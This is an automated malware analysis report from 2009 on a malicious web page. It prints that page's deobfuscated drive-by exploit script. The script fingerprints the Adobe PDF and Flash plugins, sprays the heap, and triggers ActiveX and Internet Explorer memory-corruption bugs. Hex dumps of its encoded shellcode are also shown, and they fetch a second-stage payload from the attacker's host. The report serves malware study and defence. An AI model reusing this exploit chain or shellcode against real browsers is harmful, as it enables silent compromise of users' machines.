Analysis report for http://o0w0o.com/tmp/wedding.php
Sample Overview
| URL | http://o0w0o.com/tmp/wedding.php |
|---|
| MD5 | 698f08b84cad9436f364037134dfe730 |
|---|
| Analysis Started | 2009-10-18 23:47:02 |
|---|
| Report Generated | 2009-10-18 23:47:11 |
|---|
| Jsand version | 1.03.02 |
|---|
See the report for domain o0w0o.com.
Detection results
| Detector | Result |
|---|
| Jsand 1.03.02 | suspicious |
Exploits
No exploits were identified.
Deobfuscation results
Evals
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
var VBjb = null;
try {
VBjb = new ActiveXObject("AcroPDF.PDF");
}
catch (e){
}
if (!VBjb){
try {
VBjb = new ActiveXObject("PDF.PdfCtrl");
}
catch (e){
}
}
if (VBjb){
lv = ((VBjb.GetVersions().split(","))[4].split("="))[1].replace(/\./g, "");
if ((lv < 900) && (lv != 813))document.write('
<embed src="http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=2" width=100 height=100 type="
application/pdf"></embed>');
}
try {
var VBjb = 0;
VBjb = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$" +
"version").split(",");
}
catch (e){
}
if (VBjb && (VBjb[2] < 124))document.write('
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=mi
ddle><param name="movie" value="http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3"/><param
name="quality" value="high"/><param name="bgcolor" value="#ffffff"/><embed src="http://o0
w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3"/></embed></object>');
var scode = "
%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F
%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703
%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D
%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF
%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA
%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087
%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF
%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34
%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85
%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC
%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64
%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B
%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC
%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1";
function ek13(){
return true;
}
window.onerror = ek13;
var scode1 = unescape(scode + "
%u7468%u7074%u2F3A%u6F2F%u7730%u6F30%u632E%u6D6F%u742F%u706D%u772F%u6465%u6964%u676E%u702E
%u7068%u733F%u563D%u3165%u4745%u624F%u6364%u6926%u3D64%u3231%u0000");
try {
obj = new ActiveXObject("OWC10.Spreadsheet");
if (!obj){
obj = new ActiveXObject("OWC11.Spreadsheet");
}
if (obj){
document.write(
"<script src=http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=4><\/script>");
var array = new Array();
var ls = 0x81000 - (scode1.length * 2);
var bigblock = unescape("%u0b0c%u0b0C");
while (bigblock.length < ls/2){bigblock+=bigblock;}var lh=bigblock.substring(0,ls/2);
deletebigblock;
for (i = 0; i < 0x99 * 2; i ++ ){
array[i] = lh + lh + scode1;
}
e = new Array();
e.push(1);
e.push(2);
e.push(0);
e.push(window);
for (i = 0; i < e.length; i ++ ){
for (j = 0; j < 10; j ++ ){
try {
obj.Evaluate(e[i]);
}
catch (e){
}
}
}
window.status = e[3] + "";
for (j = 0; j < 10; j ++ ){
try {
obj.msDataSourceObject(e[3]);
}
catch (e){
}
}
}
}
catch (e){
}
var scode2 = unescape(scode + "
%u7468%u7074%u2F3A%u6F2F%u7730%u6F30%u632E%u6D6F%u742F%u706D%u772F%u6465%u6964%u676E%u702E
%u7068%u733F%u563D%u3165%u4745%u624F%u6364%u6926%u3D64%u3331%u0000");
var o84r = new Array();
var m79k = 0x100000 - (scode2.length * 2 + 0x01020);
var d15t = unescape("%u0C0C%u0C0C");
while (d15t.length < m79k/2)d15t+=d15t;var f20b=d15t.substring(0,m79k/2);
deleted15t;
for (v95l = 0; v95l < 0xC0; v95l ++ )o84r[v95l] = f20b + scode2;
CollectGarbage();
var m77k = unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var e89f = new Array();
for (var e45n = 0; e45n < 1000; e45n ++ )e89f.push(document.createElement("img"));
r27n = document.createElement("tbody");
r27n.click;
var o88j = r27n.cloneNode();
r27n.clearAttributes();
r27n = null;
CollectGarbage();
for (var e45n = 0; e45n < e89f.length; e45n ++ )e89f[e45n].src = m77k;
o88j.click;
document.write("</div>");
Writes
<div style="position:absolute; left:-1000px; top:-1000px;">
<embed src="http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=2" width=100 height=100 type=
"application/pdf"></embed>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle>
<param name="movie" value="http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3"/><param name="quality"
value="high"/><param name="bgcolor" value="#ffffff"/><embed src=
"http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3"/></embed></object>
<script src=http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=4></script>
Network Activity
Requests
| URL | Status | Content Type |
|---|
| http://o0w0o.com/tmp/wedding.php | 200 | text/javascript |
| http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=2 | 404 | text/html |
Redirects
No redirects.
ActiveX controls
-
| D27CDB6E-AE6D-11CF-96B8-444553540000 |
|---|
|
Name | Value | Count |
|---|
| Attributes |
bgcolor |
#ffffff |
1 |
| quality |
high |
1 |
| movie |
http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3 |
1 |
-
| ShockwaveFlash.ShockwaveFlash.9 |
|---|
|
Name |
Arg0 |
Count |
| Methods |
GetVariable |
$version |
1 |
-
| AcroPDF.PDF |
|---|
| No attribute setting or method call detected |
-
| OWC10.Spreadsheet |
|---|
|
Name |
Arg0 |
Count |
| Methods |
msDataSourceObject |
[object Window] |
10 |
| Evaluate |
[object Window] |
10 |
0.0 |
10 |
2.0 |
10 |
1.0 |
10 |
-
| clsid:ca8a9780-280d-11cf-a24d-444553540000 |
|---|
|
Name |
Count |
| Methods |
GetVersions |
1 |
Shellcode and Malware
| Hexadecimal | ASCII |
|---|
43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80
33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df
ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef
eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef
66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa
e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9
87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e
96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a
15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb
85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5
c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66
aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba
f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28
af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64
ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc
bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07
cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64
ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64
ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e
ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64
03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec
1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc
19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e
d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3
a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef
07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70
3a 2f 2f 6f 30 77 30 6f 2e 63 6f 6d 2f 74 6d 70
2f 77 65 64 64 69 6e 67 2e 70 68 70 3f 73 3d 56
65 31 45 47 4f 62 64 63 26 69 64 3d 31 32 00 00
| CCCCCC..[3.f....
3.C...........N.
...d..d..Bd..n..
...d...a........
f....w.e......f.
...._.-.....f...
..!...;...f.....
..W.)...f...o.,.
.f........f..d..
...d....d.......
...x...f..d*l/.f
........d.....d.
.........(.....(
.........d.....d
..............4.
......d.....d...
.........d.....d
.........d.....d
................
..l....d5......d
.d..d...d..d....
..d.....&..B.,..
..Q......!......
......d.d...2.d.
.d...2d.d.*..-..
............http
://o0w0o.com/tmp
/wedding.php?s=V
e1EGObdc&id=12..
|
43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80
33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df
ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef
eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef
66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa
e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9
87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e
96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a
15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb
85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5
c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66
aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba
f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28
af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64
ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc
bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07
cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64
ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64
ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e
ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64
03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec
1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc
19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e
d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3
a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef
07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70
3a 2f 2f 6f 30 77 30 6f 2e 63 6f 6d 2f 74 6d 70
2f 77 65 64 64 69 6e 67 2e 70 68 70 3f 73 3d 56
65 31 45 47 4f 62 64 63 26 69 64 3d 31 33 00 00
| CCCCCC..[3.f....
3.C...........N.
...d..d..Bd..n..
...d...a........
f....w.e......f.
...._.-.....f...
..!...;...f.....
..W.)...f...o.,.
.f........f..d..
...d....d.......
...x...f..d*l/.f
........d.....d.
.........(.....(
.........d.....d
..............4.
......d.....d...
.........d.....d
.........d.....d
................
..l....d5......d
.d..d...d..d....
..d.....&..B.,..
..Q......!......
......d.d...2.d.
.d...2d.d.*..-..
............http
://o0w0o.com/tmp
/wedding.php?s=V
e1EGObdc&id=13..
|
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|
| http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=12 |
N/A |
N/A |
|
| http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=13 |
N/A |
N/A |
|
| http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3 |
N/A |
N/A |
|